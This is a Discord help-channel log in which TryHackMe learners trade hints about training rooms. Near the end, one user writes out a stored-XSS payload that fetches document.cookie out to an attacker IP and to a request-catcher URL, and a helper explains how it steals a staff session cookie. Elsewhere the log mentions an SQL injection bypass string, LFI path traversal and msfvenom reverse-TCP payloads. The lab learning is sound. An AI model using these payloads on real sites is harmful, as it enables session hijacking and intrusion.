#room-hints

1 messages Β· Page 106 of 1

shell token
#

is the command i ran

#

the only clue i got was when i googled the answer

#

it must be an old post but the wuestion asked to scan the first 10000 ports

#

and he has a screen shot of what he got, it was 5 ports open

#

it was 5000 in the actuall command sry

#

not used to the keyboard im using

#

i actually scanned 10000 ports also

#

think maybe it was a typo of some sort

#

still only 1 open port 53

#

Ok im scanning now.

#

Starting Nmap 7.80 ( https://nmap.org ) at 2022-02-02 16:11 EST
Initiating Parallel DNS resolution of 1 host. at 16:11
Completed Parallel DNS resolution of 1 host. at 16:11, 12.12s elapsed
Initiating SYN Stealth Scan at 16:11
Scanning 10.10.42.134 [65535 ports]
Discovered open port 53/tcp on 10.10.42.134
SYN Stealth Scan Timing: About 4.23% done; ETC: 16:23 (0:11:42 remaining)
SYN Stealth Scan Timing: About 11.94% done; ETC: 16:19 (0:07:30 remaining)
SYN Stealth Scan Timing: About 25.25% done; ETC: 16:17 (0:04:29 remaining)
SYN Stealth Scan Timing: About 45.26% done; ETC: 16:15 (0:02:26 remaining)
SYN Stealth Scan Timing: About 60.92% done; ETC: 16:15 (0:01:37 remaining)
SYN Stealth Scan Timing: About 74.18% done; ETC: 16:15 (0:01:03 remaining)
SYN Stealth Scan Timing: About 84.84% done; ETC: 16:15 (0:00:38 remaining)
Completed SYN Stealth Scan at 16:15, 258.09s elapsed (65535 total ports)
Nmap scan report for 10.10.42.134
Host is up, received user-set (0.017s latency).
Scanned at 2022-02-02 16:11:20 EST for 258s
Not shown: 65534 filtered ports
Reason: 65534 no-responses
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 62

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 270.32 seconds
Raw packets sent: 131253 (5.775MB) | Rcvd: 175 (7.700KB)

#

all ports scnned

#

yea

drifting plinth
#

@white salmon I found my mistake. I traced my file path and corrected it. Thanks for your help.

green minnowBOT
#

Gave +1 Rep to @dusk totem

shell token
#

okay, I'm going to do that now

drifting plinth
#

@white salmon It was. For some reason it wouldn't go though the zip file.

arctic spindle
#

Yeah, I did the same thing. @drifting plinth Read the last part of Task 2. If you look at my last post regarding it, I explain how to create that valid_usernames.txt file

drifting plinth
#

@arctic spindle, @white salmon Yup. so moving on to Logic Flaw. Thanks again.

arctic spindle
#

@drifting plinth Not a problem, have a good one πŸ™‚

shell token
#

@white salmon scanned the first 5000 ports same output

#

Okay, I need that confirmation. I felt stupid for over an hour. Thanks!!

#

Is there anywhere i can report it?

worn token
#

I don't think it's a bug in the machine.

shell token
#

but I wasn't the only one that tryed.

manic depot
#

Hi all. Anyone around familiar with the first Network Services room? I'm having trouble with the last question.

red sluice
#

I created a ticket with the payload and I am listening for the Cookie using nc but I am not receiving anything.

#

This is what everything looks like

red sluice
#

So I thought there was an issue with my listener and I used the THM request catcher, but all I got so far is a DNS request.

#

Alright I reset the box and all is working now. πŸ˜›

lone jackal
#

hi guys i'm stuck with password attacks room: https://tryhackme.com/room/passwordattacks
task 9
i've already generated the password wordlist with john using the format written in the hint box, but it doesn't works, can anyone help me?

grizzled shuttle
#

I'm trying to do remote file inclusion and have started a python http server but it's not working when I try to access it.

worn token
#

you haven't mentioned which file you wanna curl

grizzled shuttle
#

ohhh I see what's wrong facepalm

#

got it now, thanks. I wasn't paying attention lol

digital iris
white salmon
#

which task is that?

minor summit
#

I'm a little lost on the syntax of 10 10 10 10 little help?

#

I'm doing the beginner tryhackme course

white salmon
#

It's an ip.

#

Is it asking for the syntax to ping it?

digital iris
minor summit
#

task 4 what is networking

#

i see what i missed

inland edge
#

can anyone tell me if the box "relevant" requires bruteforcing?

cobalt oyster
#

Can anyone give me a hint for the room plunk 3, task 3, question 8?
I think I've identified the OS edition ||Microsoft Windows 10 Enterprise||
But I don't know to get the FQDN from there. I've tried searching for hostname but get too many results for the associated host.

crude fjord
#

Need help with Splunk 2 I am trying not to cheat the answer I want to actually fin dit

low fractal
#

Having trouble with mission 22 on Linux Agency... has anyone completed this?

#

||I've tried exit() and CTRL+D and CTRL+C to "escape the snakes"... what am I missing here?||

#

@dim wasp @hollow swan

#

boo... ended up reading a write-up for this one. Not the best hint fwiw.

hoary nimbus
#

hey guys I'm in the new burpsuite: the Basics, task 13. Can someone give me a hint on how to find the flag? I've put all the links from the homepage through burpsuite, but I cant see anything on the sitemap

low fractal
#

I'll take a look

#

||example/sitemap.xml not working?||

#

It's been a while since I did that room

#

||or spider using a wordlist like big.txt if you're trying to stick with using Burp only||

#

nvm, I see what it's asking you to do

#

explore manually then check sitemap in Burp. Make sure you are using it as a proxy

#

sitemap is under target tab... just check back there after you look at the entire site. Again, make sure you are using Burp as a proxy

hoary nimbus
#

Thanks πŸ™‚

low fractal
#

yw

silent kelp
#

Is there a bug in the pyramid of pain room or am I just dumb and can't get the flag?

silent kelp
#

yeah I think there's something wrong with that room

arctic spindle
silent kelp
cold eagle
#

helllooo

#

hi
i am stucked in a room jokerctf
The question is
At this point we have one user and a url that needs to be aunthenticated, brute force it to get the password, what is that password?
and from the hint i got this as a reference
Maybe burp with format user:pass and encode with base64? Note: Don't forget decode it!!

dim wasp
low fractal
#

Thank you, I'll reach out if I run into a wall again.

candid stirrup
#

Hello, im stuck in the room Ice, on task 4 it asks me Q6Running the local exploit suggester will return quite a few results for potential escalation exploits. What is the full path (starting with exploit/) for the first returned exploit? But when I run the run post/multi/recon/local_exploit_suggester in my meterpreter session, I get the output ```meterpreter > run post/multi/recon/local_exploit_suggester

[] 10.10.84.200 - Collecting local exploits for x86/windows...
[
] 10.10.84.200 - 4 exploit checks are being tried...
[+] 10.10.84.200 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
meterpreter > I did answerexploit/windows/local/ms10_092_schelevator```Which is not the answer, I've tried terminating and doing the machine again but i get the same output. Am I doing something wrong here?

candid token
#

Hi I am doing one easy challange and cant complete one task which is read flag for wayback machine, and i cant see the flag page i have exact link and timestamp right, can someone confirm?

serene cave
#

hi,
In the room Pyramid Of Pain, I'm bloqued here:
Any help? got no idea

white salmon
#

Hi everyone. Room Initial Access - Password attack, stuck here. Someone could tell me what's wrong in my syntax?

serene cave
white salmon
#

Thank you ! πŸ™‚

worthy marten
serene cave
#

Thx @worthy marten

green minnowBOT
#

Gave +1 Rep to @worthy marten

serene cave
broken summit
serene cave
white salmon
#

Thx @serene cave

green minnowBOT
#

Gave +1 Rep to @serene cave

broken summit
lethal ferry
#

Pyramid of Pain task 5 Q4 done, definitely a crazy OSINT journey...

woeful maple
#

hi I am in Room OWASP Top 10
Task 20 [Severity 7] Cross-site Scripting

When I enter some of my own html, it allways gives me Proplem loading page

#

a new tap wont connect to the machine anymore

#

when I restart firefox it simply hangs when trying to connect to the machine

#

any help on that?

#

and the flag for the document cookies isn´t accepted as answer ?!? 😟

left thunder
woeful maple
left thunder
# woeful maple own vm

If you check ip a s do you only see a tun0 interface or any extra like tun1, tun2 etc. ?

woeful maple
#

I mean the task inserting html on the xss stored area

left thunder
left thunder
# woeful maple

And openvpn is only running inside your VM and not on your host machine as well ?

woeful maple
#

yes. every works until I do what the task wants, entering some html into the comment field

left thunder
woeful maple
#

just a sec... I just went on to the next task...will restart again and then make it crash again

mild eagle
#

someone able to give a small push for pyramide of pain task 5 Q4

left thunder
left thunder
# woeful maple

And again, which question for that task are you doing? And what exactly have you entered on the target machine page?

upbeat geyser
#

anyone got any idea how to solve the pyramid of pain task 5 Q4?

#

im stuck there

woeful maple
#

I just copied that to try...but the response of the machine seems to be incredibly..πŸ˜†
I mean the machine isnΒ΄t to reach afterwards anymore

serene cave
serene cave
woeful maple
woeful maple
cobalt oyster
crude fjord
#

Oh I figured it out I had found the wrong directory

frosty fjord
#

Hey everyone, I am starting my journey with THM and am having some issues with Walking An Application. I was curious if someone could help me out. I am stuck on the last two steps of Task 3 - Viewing The Page Source. I don't understand what exactly I am supposed to do.

lethal ferry
# serene cave any hint? lots of people (me included) are bloqued here

Heya, Pyramid of Pain task5 Q4 - this is asking for the name of the file the user interacted with (or as worded in the task, i.e., "...name of the malicious document...") and which resulted in the binaries/executable seen in the task image. The answer came for me quickly only after finally moving to Google and away from performing the hash lookups in Duckduckgo (which returned plenty of hits and a rabbit warren ensued). For ages I refused to check the hint and should have early on I guess. Google returns fewer more manageable hits, and one of those gives the answer. The masked answer format for Q4 is correct.

white salmon
#

Does someone have a hint for https://tryhackme.com/room/pyramidofpainax task7 / 2nd question? Found several alternative names, but none of them are the resolution. I checked ssdeep website, but... nothing...

serene cave
white salmon
green minnowBOT
#

Gave +1 Rep to @serene cave

brave basalt
dusky sage
#

hey, fam a lamb. having an issue with the JR pentest path. metasploit exploit room, something is up when i execute this msfvenom script that i made.

#

something about segmentation

#

yes the rev tcp i made i eventually named 'poop' because after the 15th attempt i was miffed

left thunder
dusky sage
#

yeah ive made that mistake and it gives a different complaint

#

'segmentation fault core dumped' i googled and they said it had to do with memory and permissions?

#

but i'm root when executing the .elf..maybe it can't be executed in my current location???

left thunder
sturdy hearth
left thunder
#

What payload did you use to generate the .elf file ?

#

Ah nvm I can see it, so then just show me what payload you are using within handler ?

dusky sage
#

look at the pic. /x86/meterpreter/rev_tcp

#

ah this is from last night. after i spent too long on it

left thunder
dusky sage
#

ill redo it and check that the handler and payload match

#

i'm going to reattempt this afternoon. i'll make sure everything matches

#

thanks fontaene

#

thanks infloop

cedar anvil
#

no rep? here +rep @left thunder @sturdy hearth

green minnowBOT
#

Gave +1 Rep to @left thunder

cedar anvil
#

sorry infloop, raincheck

sturdy hearth
#

No no, it's okπŸ‘

deep crystal
#

hey guys, I am doing the module "Network Services 2" and I'm stuck in the task Exploiting MySQL, at the point where I am supposed to crack the hash from the SQL-DB with john the ripper. For some reason the machine I started (Kali) does not let me run john the ripper by "john hash.txt". I had to use the kali machine instead of the "AttackMachine", as on the attack machine was no sql installed and I couldn't install it manually. Any ideas? πŸ™‚

#

ah well, I figured it out, fault was on my side. I tried to start it without sudoing the command, arrghhh 😊

#

Thanks πŸ™‚

dusky yew
muted token
#

How would i go about enumerating the MTA type for an SMTP in Metasploit? I already know the answer but i deduced it from the hint...is there any way to know what it is through some sort of command?

scenic creek
#

Hello anyone to talk about Holo network ?

wheat helm
scenic creek
lime field
dusky yew
lime field
lime field
#

Yup, but for this malware there a lot of reports on Anyrun and I can't find the correct one

#

Thanks, its a good hint

green minnowBOT
#

Gave +1 Rep to @burnt rivet

urban merlin
#

In Task 2 of Windows PrivEsc, I try to run "sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .", but I get "No such file or directory". Any idea why python3-impacket is not visible in the /usr/share/doc/ directory?

serene cave
atomic ice
#

hi guys, I'm doing AoC3 day 10 and I can't seem to find usage of port 20212 (which service)

#

can you help me?

#

nvm I went too far with scanning

fallow sedge
#

hi everyone, I was just working on the Windows Event Log room and noticed that there two questions that don't agree with the normal formatting I know. Task 7 - computer name and Group Security ID... the computer name is in format I haven't seen [4].[7].[4] as opposed to DESKTOP-XXXX or WIN-XXXXXX. The Group Security ID also doesn't seem to match what I think is the answer. What am I missing?

urban merlin
iron wigeon
#

make sure you're install like the instruction

wise island
#

Good morning all, I need some help here and am feeling a little dumb, this is the beginning of my journey into cyber security, but to the point. I am in the regular expressions room and stuck on how to match every possible IPv4 IP address using metacharacters groups. Now I am not looking for an answer as I could have looked online for that just a few nudges in the right direction on how to look at this. I am looking at the answer format for help a little on how it should be layed out but just drawing a blank. Please and thank you.

wise island
#

(\d{1,3}.){4} this is what I've got so far

#

(\d{1,3}.){4}++{+,+} the rest should look like this, I used + because using a * makes it italics

white salmon
#

Hi everybody ! I'm on the POLOTELNET learning machine, but i get no open ports is it normal?
I think maybe it's an issue but i'm a complet beginner x)

I get this with Kali --> All 8320 scanned ports on ip-10-10-187-203.eu-west-1.compute.internal (10.10.187.203) are closed

#

nmap -A <ip> and many others xD

#

yes i got it... Sorry πŸ˜“

iron wigeon
white salmon
#

Really thanks for help! πŸ˜‰

#

"Now re-run the nmap scan, without the -p- tag, how many ports show up as open?" kekw

iron wigeon
#

that default nmap scan

#

like Iassi said

white salmon
#

I need only to read more... xD
"Here, we see that by assigning telnet to a non-standard port, it is not part of the common ports list, or top 1000 ports, that nmap scans. It's important to try every angle when enumerating, as the information you gather here will inform your exploitation stage. "

rich flame
#

Hello everyone. Can anyone please help me with the following problem- In "Introduction to Django", it says me to install Django. But where do I install it? In the attackbox?

left thunder
uncut frost
#

okay, going through https://tryhackme.com/room/fileinc
I'm on Task 8: Challenge, needing to capture flag 3 from /etc/flag3
However, I cannot figure out how to exploit this step, reading the docs for ||$_REQUESTS|| didn't help
If someone has a hint, it would be greatly appreciated

#

note, this is a subscriber room

cedar anvil
uncut frost
#

I have, it filters out any characters not a-z0-9

white salmon
#

Is that the one with burp?

uncut frost
#

no, it's about LFI and RFI

white salmon
#

Yeah.

#

I used burp.

#

Changed a few parameters

#

Did a few ../../ etc and got it

uncut frost
#

I have a feeling there is a better way to do it, since burp was never stated to get it

white salmon
#

There is many ways to do things.

uncut frost
#

that would be me editing the url in the address bar correct?
That doesn't work either

cedar anvil
#

No no

#

Search url encoder online

#

It converts dots to %2f and all that

uncut frost
#

any hex and such in the search bar are filtered, and attempting to change it in the address bar give the same issue

cedar anvil
#

Have you checked network tab in web developer tools for js scripts

#

Though it'd only work for client side filters

uncut frost
#

I have, haven't seen anything useful

#

although I might be missing something

cedar anvil
#

If all else fails, then you're pretty much left with modifying the request in burp/repeater

uncut frost
#

I've got burp loading now, Hoping I wouldn't have to use it

white salmon
#

a

uncut frost
#

oh?

#

I've tried POST and GET, no idea how else I would start to go about that

#

I mean, I'm used to using dev tools anywya

#

I might have to, I'll look for a few more minutes first

uncut frost
#

Thank to lassi, I finally completed it!

urban merlin
# iron wigeon What? Impacket work on virtual machine dude

No, as I said already "python3-impacket" is not listed in the /usr/share/doc/ directory. And even when I tried to install it with that Github repository, it did not work. Also I'm talking about the virtual machine built into the browser for the TryHackMe site, not an external VM like Oracle VirtualBox or anything like that.

karmic timber
#

What is the very first CVE found in the VLC media player? ||CVE-2007-01-02||

#

I know this is a simple question but I found the first CVE in the terminal however it says it's incorrect

#

I even went all the way back to the first Exploit for VLC and that didnt work after trying dozens of CVE Im beyond frustrated

flat juniper
#

which room was this in? @karmic timber

flat juniper
karmic timber
#

VideoLAN VLC Media Player 0.8.6 (PPC) - 'udp://' Format String (PoC)

#

I already tried this one and Im sure this is what its refering too

#

but the CVE isnt working

iron wigeon
#

And search on google

#

Make sure you need to add CVE-

karmic timber
#

Okay for some reason doing this way gave me the correct CVE, I was using the correct format

#

I was searching ExploitDB but it was giving me a different CVE

iron wigeon
#

No

#

Idk why it different

flat juniper
iron wigeon
karmic timber
#

Okay, Perhaps I need a full class in using ExploitDB

iron wigeon
karmic timber
#

I came over from HTB because it was kind of difficult trying to guess answers and losing connection. I hope this is a better platform

#

Thanks for the speedy help

iron wigeon
karmic timber
#

Perhaps I need to subscribe than

iron wigeon
#

that is

#

and you need to add the CVE- for the correct answer

karmic timber
#

It accepted the answer

iron wigeon
#

!docs free-room

proud scarabBOT
#
TryHackMe
That topic does not exist!

Use !docs to list all of the available topics.

iron wigeon
#

oh

#

!docs

proud scarabBOT
#
TryHackMe
Here are all of the possible topics!
!docs url

Visit the help site

!docs verify

Learn how to sync your THM profile to Discord

!docs student

Learn about our student discount programme

!docs levels

View all the TryHackMe levels & point requirements

!docs room-notes

Get started with making TryHackMe room

!docs room-review

Learn about the TryHackMe room review process

!docs api

Read about the TryHackMe API

!docs koth

How to play TryHackMe's King of the Hill (KoTH)

!docs free-path

What rooms should you do? A free guide for beginners

!docs bug-bounty

Learn about TryHackMe's Bug Bounty Programme!

iron wigeon
#

!docs free-path

proud scarabBOT
iron wigeon
#

here :)

karmic timber
#

There is a lot more free stuff than I previously presumed

#

thanks I bookmarked it, I am on the right path it seems

#

@iron wigeon Do you think its more beneficial to jump right into the paid stuff?

#

or should I complete the free stuff firstly?

iron wigeon
#

If me, i will do both subs and free rooms

iron wigeon
karmic timber
#

are there walkthroughs in the paid version?

karmic timber
#

for the free rooms as well?

iron wigeon
#

yes

#

all the rooms are having walkthoughs

karmic timber
#

okay and when you pay you get extra features and acess?

iron wigeon
#

on googles, tryhackme etc...

karmic timber
#

okay, sounds like a pretty good deal

iron wigeon
#

for more infomation about that, you can go to profile and see on Subsciber

karmic timber
#

so premium gives me full access to everything?

flat juniper
karmic timber
#

Okay, sounds like I have my work cut out for me

#

with free materials

#

one thing I noticed is that you might get a few free sectors from each module but I want to be able to complete the entire module at once

static leaf
#

!docs

proud scarabBOT
#
TryHackMe
Here are all of the possible topics!
!docs url

Visit the help site

!docs verify

Learn how to sync your THM profile to Discord

!docs student

Learn about our student discount programme

!docs levels

View all the TryHackMe levels & point requirements

!docs room-notes

Get started with making TryHackMe room

!docs room-review

Learn about the TryHackMe room review process

!docs api

Read about the TryHackMe API

!docs koth

How to play TryHackMe's King of the Hill (KoTH)

!docs free-path

What rooms should you do? A free guide for beginners

!docs bug-bounty

Learn about TryHackMe's Bug Bounty Programme!

static leaf
#

!docs url

proud scarabBOT
serene cave
#

!docs api

proud scarabBOT
#
TryHackMe
That topic does not exist!

Use !docs to list all of the available topics.

manic wave
#

pyramid

cedar anvil
#

that's the thm staff person "nanaisu | fluffs dearest"

green minnowBOT
#

Gave +1 Rep to @cedar anvil

last nova
#

summoned

#

I don't think that's necessary

#

you need to be a bit more verbose

#

look, I can't really give you advice on how to proceed without knowing exactly what you've tried, what you haven't tried, etc.
My suggestion is to go read a writeup.

sinful plaza
#

take it slow old man XD

last nova
#

sorry, but I'm kinda in the middle of working right now, I don't really have time

civic escarp
#

hey! someone did the firewall room ?

#

I can't get the answer for this question:
You need to allow SNMP over SSH, snmpssh. Which port should be permitted?

versed quail
#

Anybody here that could help me out? I'm dealing with another room where the youtube tutorial isn
Is not up to date and the written instructions are not working in the module
Linux Fundamentals Part 1

cerulean geode
#

@civic escarp follow the link provided and search for snmpssh. Scroll down a bit for the search bar on website.

quaint wharf
#

File Inclusion room, task 8. I can't seem to gat flag 1. I have tried modify the GET to POST from the browser, curl, burp. Tried various combos of ../../etc/flag1, the server always sends the same payload back.

gritty jay
#

Someone completed Gallery room? I'm stuck at privesc, any hints?

civic escarp
civic escarp
quaint wharf
white salmon
#

Hi, in room Firewalls. Hi. In task 1 Question 4 what is the port for SNMP over SSH, snmpssh???
I cant find it

viscid dragon
#

In ccpentesting room final exam (https://tryhackme.com/room/ccpentesting)

I used gobuster to find the secret.txt file, I used john the ripper to crack the hash, logged into the using nyan, and found the user.txt file, however I can't manage to find the root.txt file, I'm assuming it's under /root but I dont have permission to enter that folder, any lead please?

viscid dragon
#

Not really

#

I'll skip this one for now then

proven pier
#

Im doing the overpass challenge and im trying to get the root flag the only thing is when i setup my python3 server and nc listener i keep getting 404 not found?

#

I put my ip as overpass.thm

#

And created a dir caled downloads/src/buildscript.sh

#

I chmod +x

#

I still get the 404

proven pier
#

I put the ip in /etc/hosts, but i just get a 404 not found from the server

#

The overpass.thm

#

You wanna know what i hate... its as soon as i ask for help i get it...

#

Time for the boring part making a report lmao

opaque brook
#

Anyone else working on firewalls room?

stuck fractal
amber sail
#

how do i know which one stands out theirs so many and they all stand out imo

trim haven
#

Scan your own system and see which ones pop up, cross match and see which ones you don’t see on your own system

#

If there are multiple, google the services and see which one stands out the most

amber sail
#

it worked the first time but i messed up and ctrl c'ed the wroong terminal

#

okay nvm i got in

viscid dragon
#

Sorry for the delayed response,

I'm following the complete beginner path, is the chronological order not that important?

crystal stone
#

@latent pulsar you see it in a comment at the end of /sev-home

white salmon
#

Someone please help: i got stuck on cybercrafted room. I got the reverse shell, got the id_rsa, the users name (xx........xx) i cracked the rsa keys password (c......6) i got the user's password (d.........9) and i can't get in with these. Earlier i could get in, and start to get the last flags, but now nothing works, every time is restart the room, i get the same passwords wich don't even work. Please help in PM.

idle sierra
#

Can someone help me with the XSS room under Jr pentesting. Im on the last section telling me to grab a cookie using a brekout in a ticket submission form. I can brek out and get the cookie im looking for on my nc listener. but base64 decoding it comes up with, never the right answer

left thunder
idle sierra
left thunder
idle sierra
left thunder
idle sierra
left thunder
# idle sierra so i have to open the ticket, or someone does. logged in as staff?

As I said, whoever is opening that ticket will get his session cookie send to you. So as you want the session cookie of a staff member, you have to wait until a staff member opens that ticket in his browser. This room is build with an automation behind it, that will open that ticket as a staff member after a minute or so, all you have to do is wait for that

#

If it's not getting triggered after 2 - 3 min and you sure your payload should work, restart the target machine and try again, or use the request catcher

idle sierra
green minnowBOT
#

Gave +1 Rep to @left thunder

idle sierra
left thunder
idle sierra
#

listener*

left thunder
idle sierra
left thunder
#

Show me the payload you are using for the request catcher pls

idle sierra
#

on the catcher you dont use 10.10.10.100 huh?

#

you use the URL they provide on the site?

left thunder
idle sierra
#

"</textarea><script>fetch('10.13.15.42:9999?cookie=' + btoa(document.cookie) );</script>" " this is what im using now.....chaning it to "</textarea><script>fetch('c44ecbd333d0bda91623c8c37d65dae0.log.tryhackme.tech?cookie=' + btoa(document.cookie) );</script>

left thunder
#

Wait, you have removed the http:// part in your payload, for both your attacking machine and request catcher

idle sierra
#

i guess i need that hu

left thunder
idle sierra
#

ok giving it a shot on my nc again with the http

left thunder
#

Also I suggest restarting the machine again once you used that bad payload, as this machine is a bit finicky when providing bad payloads ^^

idle sierra
#

roger

idle sierra
#

no luck at all lmfao

#

if i click the ticket, i grab my cookie so i know its working

west magnet
#

Hey I dont get the question "When will the crontab on the deployed instance (10.10.167.49) run?" of linuxfundamentalspart3?

left thunder
# idle sierra no luck at all lmfao

Ok, well then I guess use the request catcher, you could try to create a new ticket with it right away, or the more reliable approach to restart the target machine again and then create the ticket with the request catcher url

west magnet
#

yes

left thunder
west magnet
#

huh

#

but there are only # lines

left thunder
west magnet
#

then it runs on reboot?

#

ow lol I'm dumb

#

thnx

left thunder
idle sierra
# left thunder You are welcome

well i got response from the thm reuqtest catcher, but it was a dns request and then waited 5 mins and nothing, im gunna go to a different room and come back to it. Seems i am terrible with xss

idle sierra
green minnowBOT
#

Gave +1 Rep to @left thunder

west magnet
#

how do you get rep?

white salmon
#

When someone thanks you.

#

So when someone direct replies, or mentions your @west magnet with the word it will add rep.

dreamy orchid
#

so i'm working on offensive pentesting. I am new to this so i could just be completely dumb, and i accept that. In the vulnerability module uner reconnaissance, it asks for the port the web server is running on. I watched the video and it shows 3333, i entered 3333 and it worked. I can not find a web server running on port 3333 when i scan the system. I did nmap -p- SystemIP, I tried just searching port 3333 with nmap -p 3333 SystemIP. Specifying the port tells me the port is closed. idk what i am doing wrong. any help is greatly appreciated.

umbral umbra
#

@dreamy orchid Are you scanning from the attackbox?

dreamy orchid
#

@umbral umbra yeah i was in the box, ran the nmap and scanned the ip specified at the top of the machine

umbral umbra
#

at the top of what machine?

#

can you post a screenshot of the command you used?

dreamy orchid
#

yeah

umbral umbra
#

you'll need to verify first

#

!docs verify

proud scarabBOT
dreamy orchid
#

i am probably doing something wrong i just can't figure out what

left thunder
dreamy orchid
#

that will certainly do it

#

i'm dumb. totally forgot you have to start your attack machine and the other machine which is at the beginning of the lesson...

dreamy orchid
#

at least i had the commands right... lol. thanks for the help really appreciate it!

keen nebula
#

Anyone know why kerbrute would return 0 usernames in attacktivedirectory?

#

Never mind. Had to add the IP to /etc/hosts

hallow tinsel
#

Someone can help me with this room?

idle sierra
#

can you specify cookies in curl requests?

#

nvm i think i just answered my own question >.>

little tree
#

I need help in a question What was the original target of Stuxnet?

#

This is the room

left thunder
little tree
#

I read the task multiple time

#

yes I did

#

it says read article

white salmon
#

Then read the article.

little tree
#

I did

white salmon
#

It will tell you who was the intended target.

little tree
#

123 1234 1234567 123456789

left thunder
little tree
#

This is the answer pattern and nothing matches with it

left thunder
white salmon
#

No, there was specific target.

little tree
#

It is done

#

I read again and the answer was in front of me

white salmon
#

πŸ˜„

little tree
#

XD

white salmon
#

Stuxnet was VERY effective.

#

Look it up.

little tree
#

Yeah

viscid dragon
#

I need to edit this script so it'll accept my file, how do I edit the script inside the js file before it loads?

alpine kestrel
#

can you not just delete said lines in the request to make it not load the js???

viscid dragon
#

I tried deleting the line, but it contains the script what to do incase the file is valid, when you delete it, it does nothing when you click upload

thorny thunder
viscid dragon
#

I did edit the options and removed |^js$

thorny thunder
#

Great, did you captures the js file now? Otherwise try reloading without cache Ctrl+F5

viscid dragon
#

the screenshot I uploaded was after removing the options

#

Should the file appear somewhere else?

thorny thunder
#

will watch how i did it moment

thorny thunder
viscid dragon
#

the folder name is Assets

#

but how did you edit the js script?

thorny thunder
#

By capturing the js file but sometimes when you first loaded the site the js file is already cached. Then you can't edit and you need to reload the page with Ctrl+F5.
Then in the proxy tab in Burp forward the others and look if the filter.js file comes by.

viscid dragon
#

Ctrl+F5 in the browser?

thorny thunder
#

yeah

viscid dragon
#

I tried that, it doesnt work :/

#

after I update the options tab, do I need to save it somewhere?

thorny thunder
#

proxy on, Ctrl+F5 reload page then everythong goes to your proxy also the js file

#

then forward the nonsense and edit the js file

viscid dragon
#

Ohh I get it now! I didn't notice I was intercepting the wrong GET request

#

Intercepting the right GET request for the js file did it

#

Thanks @thorny thunder

green minnowBOT
#

Gave +1 Rep to @thorny thunder

south garden
#

im doing the overpass challenge and im trying to get the root flag when i set up the python3 server for port 80 it say address in use, am i missing something?

little tree
loud nebula
#

FYI: check pin message on #site-support which ports you can't use on attackbox

white salmon
#

Hello

earnest charm
#

hint: it holds a lot of info, messages and more.

#

@azure hound

green minnowBOT
#

Gave +1 Rep to @earnest charm

earnest charm
#

you're welcome

azure hound
#

❀️

earnest charm
#

might want to delete the message with the correct answer

#

or hide them with || around the words

azure hound
#

done! thanks ❀️

woven mortar
#

@patent musk

#

I'll help you out here.

#

also, what room are you doing?

patent musk
#

a

#

נקגןמ

woven mortar
#

wut

patent musk
#

begin

patent musk
woven mortar
#

what?

patent musk
#

Learning Cyber Security

Get a short introduction to a few of the security topics you'll be learning about.

woven mortar
#

ohkay?? eyes_sus

#

to begin with, what room are you doing?

patent musk
#

view site

woven mortar
#

smh

#

what is the name of the room you are doing?

patent musk
#

i no know how found username ... its my problem

woven mortar
#

for me to help you, I need to know what room you are doing to be on the same page

patent musk
#

send friend

#

i have image

#

for you for see

woven mortar
#

!docs verify

proud scarabBOT
woven mortar
#

you can verify yourself and share a screenshot here.

patent musk
#

oh ok (:

woven mortar
#

πŸ˜„

iron wigeon
woven mortar
#

huh

#

interesting

patent musk
iron wigeon
#

I said look at the URL πŸ™‚

woven mortar
#

John, do you know what room he is talking about?

iron wigeon
#

It have some highlight

patent musk
#

wait i verify to see you

woven mortar
#

ngm

#

got it

#

alrighty Larry

#

let's get you sorted out here

#

did you click the view site button?

patent musk
#

yeah

woven mortar
#

okay, did you see something like this?

patent musk
#

yes

woven mortar
#

do you see the little finger?

iron wigeon
woven mortar
#

pointing right?

woven mortar
woven mortar
patent musk
#

i know i end this

iron wigeon
woven mortar
#

did you click on it?

patent musk
#

i no know how found an user i got url

patent musk
woven mortar
patent musk
woven mortar
#

yeah good

#

did you click on that little finger?

patent musk
#

send image if its bookface?

patent musk
woven mortar
#

do you see a page like this?

iron wigeon
#

Or i got lag?

woven mortar
patent musk
#

yes

woven mortar
#

that's where you can find the answer

woven mortar
#

you'll find the username blobfingerguns

iron wigeon
patent musk
#

ok

woven mortar
patent musk
#

but i in bookface i no know how find user

woven mortar
#

take a very close at the URL πŸ‘€

iron wigeon
green minnowBOT
#

Gave +1 Rep to @woven mortar

woven mortar
#

that URL

#

@patent musk

patent musk
#

oh

woven mortar
#

did you find the username?

patent musk
#

wait

woven mortar
#

sure

patent musk
#

can you send link for bookface of image i no know if is it beacuse i no find nothing only music...

woven mortar
#

what are you even talking about?

#

please verify yourself and share a screenshot

#

so I can understand your problem better

#

put it there

#

DM it to the bot

patent musk
#

oh i need to change server privalcy

#

oh ok thanks

#

its bookface?

woven mortar
#

oh my god

#

not there

#

just click on that button in the room

#

EXACTLY!

patent musk
#

and put on google?

woven mortar
#

you got it!

woven mortar
#

you don't do that

#

I can see the Username

#

you should too

#

and that is THM's vulnerable site

#

it's their sandbox environment

#

for you to learn

#

so, no putting stuff into google

patent musk
#

ok what i do with this?

woven mortar
#

you answer the questions....

patent musk
#

oh thanks

woven mortar
#

aye

patent musk
#

bye thanks

woven mortar
#

happy to help πŸ˜„

patent musk
woven mortar
patent musk
#

How much did the data breach cost Target?

patent musk
woven mortar
#

know what?

#

you have to complete the challenges and answer the questions

patent musk
#

no i no know what how i found it

#

and i no know what is the question?

patent musk
#

oh no sorry

radiant moon
#

Folllow the lesson steps in the sequence, watch the video and you will figure it out.

drifting plinth
#

Nmap Live Host discovery on Task 5. When I try to input that Text in the Data field, I get an error saying its invalid. Can I get some Pointers of what I'm missing?

white salmon
#

Can I have the room URL pl0x?

drifting plinth
left thunder
#

!docs verify

proud scarabBOT
drifting plinth
#

@left thunder Just to confirm. This token is in Dev tools?

left thunder
lime violet
keen lintel
#

Hi there. The WebGramming task3 and task9 are left. Anyone can help?? I am so grateful.

inland shadow
#

doing Game Zone atm. Can someon explain my why ' or 1=1 -- - works, but ' or 1=1 -- doesn't

inland shadow
#

I found mysql documentation about comments, but wanted "deeper" explanation. This is gold - Thank you!

full arch
#

Working on the "battery" room, I need a hint : Is ||xxe|| a rabit hole ? Because the ||expect module|| doesn't seem to be loaded, making ||rce|| impossible... Thank you for any help πŸ˜‰

teal osprey
#

anyone able to give a hint for pickle rick?

#

so far tried nmap with scripts (only getting 80 and 22), tried gobuster (got nothing except assets), tried SSHing in as R1ckRul3s but get permission denied pubkey, tried a couple other usernames in SSH

#

also tried looking for open UDP ports

mighty iron
#

